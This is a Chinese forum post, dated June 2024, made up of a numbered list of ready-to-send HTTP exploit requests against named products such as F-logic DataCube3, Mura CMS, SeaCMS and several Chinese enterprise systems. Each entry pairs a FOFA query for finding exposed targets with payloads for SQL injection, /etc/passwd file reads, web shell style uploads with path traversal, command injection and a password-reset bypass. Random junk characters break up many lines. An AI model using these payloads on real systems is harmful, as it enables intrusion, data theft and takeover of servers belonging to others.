! | h7 f! B; s2 T* M: D- s: XGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1& w$ c9 z7 t. ^, A' ~1 v3 U0 v
Host: host
: }3 \/ t$ _- k! a5 z
6 \7 U+ [, K& U T) X
' Q& Y5 P2 r6 `+ Q% m" x3 h186. F-logic DataCube3 SQL注入5 z- }, b ]. E
CVE-2024-31750
6 ]- q3 X+ K) L' {5 o) Q% [3 n# b. yF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
( V& q& w. \; u6 o2 x$ L! J8 h% zFOFA:title=="DataCube3"
& n$ e6 g# z1 j$ T0 M7 SPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1" n# e' K9 Y. y0 p7 R o
Host: your-ip' o& U9 `8 s* N: j a$ E9 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
j1 N8 y4 D: dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.82 Y8 ]$ S' @" }6 Z$ c8 F8 d4 k g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 F/ ~; Y! [3 E+ }8 ^$ \5 PAccept-Encoding: gzip, deflate) m+ }$ q! G2 V) o3 F# k" `7 ?
Connection: close5 z- B8 r K( j( Z4 N3 {* y' S) T
Content-Type: application/x-www-form-urlencoded' s! q. e' h( U' [' z
5 }+ t8 O) A; E3 hreq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450# i8 S% O- l3 x% m. ]- Z: }
4 _: O% f/ x6 N5 K( ?# Y {' l. C0 o' H: o3 e8 f) e% [& m
187. Mura CMS processAsyncObject SQL注入
8 p; X- n+ T1 vCVE-2024-32640
+ t" p, u2 |/ i/ fFOFA:"Mura CMS"/ h) m8 G4 H/ D( r
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.11 g4 c& x+ g3 R. R
Host: your-ip+ S2 X5 o& S7 g. J$ y
Content-Type: application/x-www-form-urlencoded) i: c; ^1 |$ |- l E4 L: y
4 k& V& B) Z; f
$ j( b3 Q" @% \object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=11 Q Y$ J+ J1 d
% i4 \$ g3 t8 L) l: O# F# M
; B0 t) S5 g0 i0 X1 `# O
188. 叁体-佳会视频会议 attachment 任意文件读取
0 [, i5 ?; B% a5 \6 f Xversion <= 3.9.7
5 e8 g; D! ]% z$ z: Q, w8 DFOFA:body="/system/get_rtc_user_defined_info?site_id"
( I/ J, n! U _7 g6 \ vGET /attachment?file=/etc/passwd HTTP/1.19 _3 O! G, z3 i( a2 O; F0 _
Host: your-ip5 n9 R% k$ R- a2 T# D1 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.363 ~0 F' ]; r: A3 Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* S- s& _0 l1 O a) s- n
Accept-Encoding: gzip, deflate
% f9 q+ | c1 t: H3 ^- O5 ^Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
; W- n0 E6 }) MConnection: close
& y. R, J3 h: u/ [6 J) w4 h8 A. b, }( p: S9 v
1 R6 W, O! M: Q
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
L5 f! ?/ v: E3 p" n% ~& r4 fFOFA:app="LANWON-临床浏览系统"5 y; A: G4 }; q% e
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
6 c4 w- ~$ _! I& p# c( FHost: your-ip
* _7 q8 D% y8 n- D% H$ YUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
* K- l' P' E1 t& z( L& u. c+ x& rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 L* N, e7 w D( P' H+ Z; A
Accept-Encoding: gzip, deflate. T Z8 j; x" |
Accept-Language: zh-CN,zh;q=0.9: @' |6 u7 H- X7 V
Connection: close
2 @' |. r, k" E" I" H+ D' C# s/ y' B: V
% ]' c$ \, D; _1 g190. 短视频矩阵营销系统 poihuoqu 任意文件读取! |6 l8 q1 B4 W2 g5 z, M( Z3 p7 t! q' S
FOFA:title=="短视频矩阵营销系统"9 `' @ O4 E/ | s: g
POST /index.php/admin/Userinfo/poihuoqu HTTP/25 S& k! t' i/ P+ T% k( t$ `
Host: your-ip
" U$ I: n! C) ]" q9 f3 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
* V: G0 B/ V# w, y# R7 k$ cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9) I: i) ^* S4 g1 \' V$ n
Content-Type: application/x-www-form-urlencoded7 w; k+ \ e9 ~0 ? A2 [
Accept-Encoding: gzip, deflate
1 |% h) d$ ]0 ?% X5 o7 a8 {3 VAccept-Language: zh-CN,zh;q=0.9
" q W: I i7 C8 A
1 l2 i6 i: J& G1 _9 }3 X, p4 i# Tpoi=file:///etc/passwd/ V0 k8 E1 r" k1 p
1 ?5 O3 `5 }9 i: Q. z! m5 o- m
, a* i4 E/ | P191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入( n, r/ D3 [2 p4 U6 {1 c& b
FOFA:body="/CDGServer3/index.jsp"8 V9 ?" ~! Q/ x0 ]4 J; ?
POST /CDGServer3/js/../NavigationAjax HTTP/1.1. g- O. T9 t f7 X
Host: your-ip. i% v! T6 k2 [( c
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
& z" j' A2 `6 q' dContent-Type: application/x-www-form-urlencoded
0 P3 C" u3 z% j! A8 ` s5 k7 _
; z% h# A( P9 d$ n- c+ Ecommand=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=& [8 ? [; i' H W
8 m' b& v0 t. d" D# {& b; E
# ~% f) {8 Z+ s# X/ m) l- O4 W192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
; h9 s5 }( Z' p2 N6 J- QFOFA:title="用户登录_富通天下外贸ERP"
- G8 c+ r2 A& f S, {% N! PPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
! ^6 u1 L& B3 Q9 J! }4 DHost: your-ip& ~* r/ _' ?4 ~. ~! n7 y: w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36# x+ r8 \) u3 H+ j5 \- x
Content-Type: application/x-www-form-urlencoded3 R! O+ J7 }8 ?2 g
Q1 k) E+ n( x2 a' ?% g
6 h! Y3 ^, `$ d# v( |+ u+ [
<% @ webhandler language="C#" class="AverageHandler" %>+ o! ~/ o0 R# @4 G9 _
using System;
6 {4 `' Z4 c. ]6 V Y$ P8 rusing System.Web;+ \' H& b* N$ m: i7 W
public class AverageHandler : IHttpHandler
1 i( I- C9 g: n Z& ]{" N: Z- s: s6 R4 N* u ~1 s6 i5 s
public bool IsReusable# a+ j' X; I, J: j
{ get { return true; } }9 x# W4 n& b. q9 r0 l* i
public void ProcessRequest(HttpContext ctx)
+ Z# B' c6 l. r8 Q1 w{; X& B1 s& k; ?% p, G
ctx.Response.Write("test");
* S) ?8 G1 x) p+ v}* ] @ z* O4 J m
}6 W3 [$ A0 |" w+ v5 N
! F, J# ?0 r3 q7 W+ E- x2 R& a7 N0 o1 a$ x2 f4 U
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
- ^6 {9 v" t# M/ H# n3 g; zFOFA:body="山石云鉴主机安全管理系统"* q$ z1 G/ f, ^. g+ Z* z
GET /master/ajaxActions/getTokenAction.php HTTP/1.1" y! Q0 z5 J, x
Host:
+ i/ q4 s" y3 p" a7 ]& I" XCookie: PHPSESSID=2333333333333;+ W$ n% Z. X+ z5 `, P% ?& D
Content-Type: application/x-www-form-urlencoded
9 x9 u3 {, V( j/ a. F% X4 LUser-Agent: Mozilla/5.0( H. _( I3 x8 T9 x
' u( \2 @6 d( p) Q& i
- A) k* M7 G$ q) wPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1 {+ G! q+ E( {. ]' L
Host:. X) R: A# g. I% J: c
User-Agent: Mozilla/5.0
H! M( V/ O \1 p' CAccept-Encoding: gzip, deflate
' R# N* ~/ W. q' yAccept: */*, @9 O0 @, s& H- h& j
Connection: close
^* C' H/ T. G& H' U3 r K P8 u" ^1 ZCookie: PHPSESSID=2333333333333;
2 j3 o5 `0 r# Z6 iContent-Type: application/x-www-form-urlencoded2 v: o( ~* o9 @6 c# }
Content-Length: 84
9 E/ {: q8 u6 p/ _* P/ k, o2 D I- f, y# z$ Z6 R0 L
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')0 N, e% N( r& ]/ m- R) y
$ o- y3 `" U" w% n- Y. I
) @8 V: d% k8 c7 KGET /master/img/config HTTP/1.1
# e4 ? }0 o- uHost:4 a, l u$ W0 B9 H2 a' _3 ^
User-Agent: Mozilla/5.09 n; H. z5 a e3 ?+ X; E8 ?
$ ?( \3 |& _( n* g
! h7 a, ~. ?: B. C2 Z- h/ c$ q194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传; v: G4 ^6 ]4 a$ N
FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在9 v3 u' R% c" _& i. V; G
8 p. y! ]% b' e) z/ j, c0 K
POST /servlet/uploadAttachmentServlet HTTP/1.1" w5 ^: ]0 o& H/ o$ n, t0 V) j5 T1 f
Host: host6 P5 k3 G- \/ C9 h3 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36. M, _/ e3 |0 l7 Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8; r, g! P% h1 j7 g# i
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 T/ S+ y% X- ~) k- O
Accept-Encoding: gzip, deflate9 p! N% s: M6 x2 D |1 C8 [+ @
Connection: close; ^9 E- {0 L8 O2 A$ s. J
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
$ C0 V! v) G j: v6 V9 X------WebKitFormBoundaryKNt0t4vBe8cX9rZk
! }4 L8 N; ^7 C }9 D: `2 o9 k C( @ b3 r
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"* z( t" _$ X# |: U% q* [" l1 N
Content-Type: text/plain
e& [$ Q1 |1 a8 W, F9 J( ?+ @<% out.println("hello");%>& z) v: y! i( r6 z8 v5 ?8 M
------WebKitFormBoundaryKNt0t4vBe8cX9rZk7 F1 J) J+ [ t7 _! }2 d7 |
Content-Disposition: form-data; name="json"2 P4 f3 i2 N# g) u) V
{"iq":{"query":{"UpdateType":"mail"}}}
& o/ ]- f, t( ~8 a, G$ G3 |6 [------WebKitFormBoundaryKNt0t4vBe8cX9rZk--' Q; G. D3 ?) C
4 t7 |2 x# H- p9 `9 d' H. P1 I8 m/ T I' {
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
8 U! Q5 f7 U: E8 j8 A8 v9 _! w" XFOFA:title=="飞鱼星企业级智能上网行为管理系统' Z$ r: w/ F, p2 N
POST /send_order.cgi?parameter=operation HTTP/1.1
5 f* K, a) z- o G N( dHost: 127.0.0.1
' A) H5 W; C, {2 r' L) aPragma: no-cache
) J8 o0 c8 m5 X% I( Q; k# R/ [Cache-Control: no-cache, R+ }5 [; |0 f# ~& K7 L& n) c$ Z0 U( {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.365 ]5 h' M( T4 L" j. W d
Accept: */*; D6 @/ Y% h0 m* M: J
Accept-Encoding: gzip, deflate
2 n/ p/ ]6 S$ f% Q2 W, W: L) yAccept-Language: zh-CN,zh;q=0.9% b2 d) Z, N, E/ L
Connection: close# f: \1 O( t: z. O+ Z3 [
Content-Type: application/x-www-form-urlencoded
% @$ h9 c, r+ l; V8 t5 c3 P7 O2 o) N& MContent-Length: 68. S2 p* s4 u3 J7 Y: `# s; {
, }" ?6 V& t p3 A+ R5 L
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
. X; s8 g' A! M: m: T3 n
1 s. G5 C. {: j+ _9 j
G/ q; I' @% @196. 河南省风速科技统一认证平台密码重置" x7 |! q2 ^% a' @; @# ^ n2 {0 R
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
5 M" J& a- A2 \1 b. kPOST /cas/userCtl/resetPasswordBySuper HTTP/1.1
/ N. }# ^- |1 {: u" `: aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+ ~, _3 D* P4 S9 \Content-Type: application/json;charset=UTF-8+ g1 C' f* ?. _+ l, J ~! x
X-Requested-With: XMLHttpRequest
: g$ p; i8 S% u& F7 MHost:
# e# V7 ]) R0 y8 J! _2 iAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
$ z2 h) q: U/ a8 J, p! B) }! s8 D/ r0 YContent-Length: 456 r$ F8 \9 Q, v& e9 d
Connection: close u! x& Z, V: I! l
1 ^! J4 Q( ^' i- M- ~) `{"xgh":"test","newPass":"test666","email":""}+ Y2 d! `: r# `4 r, G7 o
* {3 {/ b" K- D8 F4 y4 x5 k$ d+ e8 i- V
7 }0 z; r# ~* s4 P( [8 Q1 T197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
/ F( m4 ?, R' v. C: y( qFOFA:app="浙大恩特客户资源管理系统", c6 y. u" t2 v: r3 ^# x& a ~
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.11 V; m8 |9 b. {+ ~1 O, \
Host:4 L! l) D1 o3 x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
4 V7 q6 `8 g2 Q5 y' jAccept-Encoding: gzip, deflate- Y$ J$ w5 I- }; {, |! q
Connection: close
; \% K8 \* j9 r) V: L Y8 F e- t3 m" `+ t u8 W+ C
+ R7 Z$ s9 R7 i0 f! i- v A! V
6 Y1 \. @1 \& ^. Z$ v' N198. 阿里云盘 WebDAV 命令注入
0 ^- h3 h7 n @7 \1 W( C) A" M3 OCVE-2024-296403 u9 K9 ?1 M% O* a: _9 ^. L! F% Z4 o
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1; h: w E6 a3 m! `
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64( S9 m6 Z U s9 M& `/ i0 N! A
Accept: */*
6 ^1 [# [# _) c3 k s+ EAccept-Encoding: gzip, deflate; X9 w4 a# g' R2 a8 f" a, p7 c1 J& F
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Z8 r+ f' Q8 w) k& z; GConnection: close* @1 u( R8 P# i
7 l7 }& n; ~$ U* o! W: ~
( F0 m' j" u; L- p: y
199. cockpit系统assetsmanager_upload接口 文件上传
+ _" Z2 }" t: o1 i' R
) t0 x. R* b7 @* F8 o1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
+ u( z) h* ^ g7 F$ P( _8 Q! ]0 ZGET /auth/login?to=/ HTTP/1.1
$ ^( T% _( c ~4 b$ B
5 T6 |& Q/ O$ Z8 {9 l' d- c1 s响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"4 b: n4 q2 Z& U
5 G% r7 n E- E8 ^, D2.使用刚才上一步获取到的jwt获取cookie:
: j* m' B# ~8 \9 r0 E1 M c# j9 _0 {
POST /auth/check HTTP/1.1
' y" p. l( s2 B( gContent-Type: application/json
2 s6 Y- Q+ e5 ]: Y/ v8 _+ c( o2 P e9 \! d( S8 j
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
# [3 W( Z n) Z: s# X1 ` U8 M: q9 F4 n7 V% E, R4 p1 ~* C$ y! o
响应:200,返回值:2 t& k# v4 Z6 @+ h" G" m
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
) [" p1 x! E0 y8 t; S' s0 @( gFofa:title="Authenticate Please!"
1 ]# V& C( G( B; {6 e) F& `POST /assetsmanager/upload HTTP/1.1, j: l& y$ g$ i( n7 m
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
. L, K. ^& d) mCookie: mysession=95524f01e238bf51bb60d77ede3bea92
& X1 p) q4 E' v* M- ^
7 N7 U% F- G. C0 K2 S# x2 m0 }( g-----------------------------36D28FBc36bd6feE7Fb3
+ A8 V7 ]. t7 x# m, C: m& ~9 {9 w$ q7 {Content-Disposition: form-data; name="files[]"; filename="tttt.php"5 n j- M6 a/ `8 z
Content-Type: text/php7 Y; g: Y' W ?4 t- ^
/ J+ }4 x- a, F1 A$ {<?php echo "tttt";unlink(__FILE__);?>
8 R# Z: K& r* `# w3 L+ W1 E( l-----------------------------36D28FBc36bd6feE7Fb3( X* W! O/ [, \+ Z
Content-Disposition: form-data; name="folder"+ j% s3 b v# d# M: O
' D! E) r! }4 j8 O8 S! s. T2 q& ^3 [5 E( ?
-----------------------------36D28FBc36bd6feE7Fb3--
O! K, n! c* `! i" A
# O& F7 U9 {: o, A6 s3 }9 D* V" ?8 Q8 s; }) F
/storage/uploads/tttt.php$ V4 Y+ Z8 R& w& }7 O7 m! l
- W6 U$ p0 m( `% u200. SeaCMS海洋影视管理系统dmku SQL注入0 I3 I% ]* C% N
FOFA:app="海洋CMS"* V) I2 @) D% q
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
# f* A' d/ e1 H1 p4 ?Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
7 p+ R4 V3 \6 P" `- ~4 f7 iUpgrade-Insecure-Requests: 1$ R0 i- K! F$ T& q( @8 @
Cache-Control: max-age=0( S3 a1 t- u' W2 M( ~" l: [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 ~$ u6 V1 N) x8 }( |7 \6 z
Accept-Encoding: gzip, deflate) f1 b3 `+ R. e; V) J
Accept-Language: zh-CN,zh;q=0.9 v; s, j% x- `* \0 j0 y' P
2 c8 Y3 M; D2 L9 Q% w2 Q* l1 s" B
+ A1 N8 G, Z8 M! W) E# s! R7 x201. 方正全媒体新闻采编系统 binary SQL注入
: i7 Q" E# \$ @2 s P3 HFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"9 [+ i) z) m; `( j P! W# O y$ Y
POST /newsedit/newsplan/task/binary.do HTTP/1.1
4 d# p, _3 g8 h9 t2 K. SContent-Type: application/x-www-form-urlencoded3 L# c/ {/ _0 k. v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
1 O- x4 T! a \' R( wAccept-Encoding: gzip, deflate
, r7 Z. ^; a+ s( gAccept-Language: zh-CN,zh;q=0.9$ u0 [" ^3 N) T
Connection: close
2 l$ _8 @' V, i1 Q' \& [5 F
+ O9 s" }7 j3 P; _( aTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1- ~ j M4 L5 E1 I
9 a/ V/ f8 E! ?, K; I( Z( A' y- g% o$ q" ?
202. 微擎系统 AccountEdit任意文件上传
& ^7 G7 G( h( }- l5 r2 h* \9 k- RFOFA:body="/Widgets/WidgetCollection/"7 E- W0 U- Z7 k( n9 t
获取__VIEWSTATE和__EVENTVALIDATION值
. c: G {. r# J( wGET /User/AccountEdit.aspx HTTP/1.1
; G& I( I8 P: {% s: a$ ?' EHost: 滑板人之家
+ j0 ^3 j. q3 A% }% CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31) a$ a" B6 b" H! A# w) z
Content-Length: 0
2 P$ v8 q( d1 X9 F8 S9 }9 i1 [0 W- J1 O; X! s
# p# {$ _$ @$ `% u( n0 Q替换__VIEWSTATE和__EVENTVALIDATION值
, N, d% m- R$ p0 ^5 ?: QPOST /User/AccountEdit.aspx HTTP/1.1
; Y8 ]5 d# U# B* GAccept-Encoding: gzip, deflate, br
; S8 _9 d2 Y" B6 L2 g( QContent-Type: multipart/form-data;boundary=---------------------------786435874t385875938657365873465673587356874 n2 ?) G) z" R" }) z( T6 C
. ^, T8 m" m& I& f. x; t9 h-----------------------------786435874t385875938657365873465673587356872 `" \# j# X% k6 @: Y' m
Content-Disposition: form-data; name="__VIEWSTATE", O3 n9 ]! ?/ M! p0 Q2 ?, u+ X! p
. k3 w9 t; x7 S- R1 `; A h! X! i__VIEWSTATE8 X) |& j2 p1 \ B0 j" @
-----------------------------786435874t38587593865736587346567358735687
. q. Y; e% V) o2 A. T7 Q; fContent-Disposition: form-data; name="__EVENTVALIDATION"
6 u* Z3 C: _+ x
, a/ O d# W7 Y. `__EVENTVALIDATION
* Z. f5 r5 S" J( t-----------------------------786435874t38587593865736587346567358735687. w4 ~( `* C, ]3 ^" I& O
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
- h: G- u/ _* b! FContent-Type: text/plain
+ @: Q! r m' }: v% {, J* V8 o3 z" W8 U8 K3 Q H4 m4 ~3 p$ v( n
Hello World!
! b( x# y) U' g, h, d9 h-----------------------------786435874t38587593865736587346567358735687
# O% d. O n3 l6 v* T3 L: Y( XContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
+ @' U$ C' o8 t; R9 P$ w2 U6 }$ g; |, c- L) D- k
上传图片
9 Z# s w2 m6 {6 U$ O. ~-----------------------------786435874t38587593865736587346567358735687
" u9 t* j- Z6 u- e' k" B; mContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
s9 J+ K. |0 ~6 a3 u+ |" c6 u! q& Z% M
* \: |4 P; l( D' d2 o& Q0 j
6 ^! P% ^, W' t1 q& }6 b g-----------------------------786435874t38587593865736587346567358735687
6 d* @& e1 V) m( j. A2 I n8 xContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"8 J6 c$ Z# @$ M7 o
2 S" H5 S- t$ `5 `. C( D
( s3 x, \; r) y* V: s6 H/ o* R, V4 i
-----------------------------786435874t38587593865736587346567358735687--
4 F3 \: e$ Z& \( n" u2 ~# S' U3 g
3 F+ p2 C( `1 [/ Y0 W, B) { q) v. C2 y- R7 D9 H
/_data/Uploads/1123.txt
& B ^% `2 h+ ?$ Z% }, r0 F" N/ |' _3 a$ ^
203. 红海云EHR PtFjk 文件上传
( D: I- r7 G+ l7 c" {FOFA:body="RedseaPlatform"
4 }9 D; o& u, P: @" c* YPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1' R, z( z- u$ j& r; P* v9 T
Host: x.x.x.x! l3 i1 \5 c, X) p" q0 P& E
Accept-Encoding: gzip( w3 w+ U: ?1 `2 j2 M! N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
) h- E8 B3 u/ d% v7 @) LContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
8 k5 `7 \2 [! B7 |* c9 a' nContent-Length: 210
1 Q6 V. K1 S2 }, H2 k* x) r1 j' B
------WebKitFormBoundaryt7WbDl1tXogoZys4
6 F- o5 M; x4 }Content-Disposition: form-data; name="fj_file"; filename="11.jsp"4 w2 Z: a1 H6 c. C9 `% w+ s: L4 U
Content-Type:image/jpeg
4 F3 j. h- T8 X; k) [) Q4 E: F
6 z; X8 ^7 x( _+ @5 V<% out.print("hello,eHR");%>9 Z- W. p0 M5 q5 c" S0 I+ q
------WebKitFormBoundaryt7WbDl1tXogoZys4--
Y- i' l! l- s; k& L" p" F7 k6 n' T B J6 f$ L! _" |% g
8 ^ _3 Z3 g' q9 a i* B6 x, b, P6 Y3 {9 V
6 b3 h( @# @3 R4 }+ r
1 l( ~2 T" ^2 g5 a7 Q2 s/ x. g! u0 n- b8 `
|
发表于 2024-6-5 14:31:29
收藏
支持
反对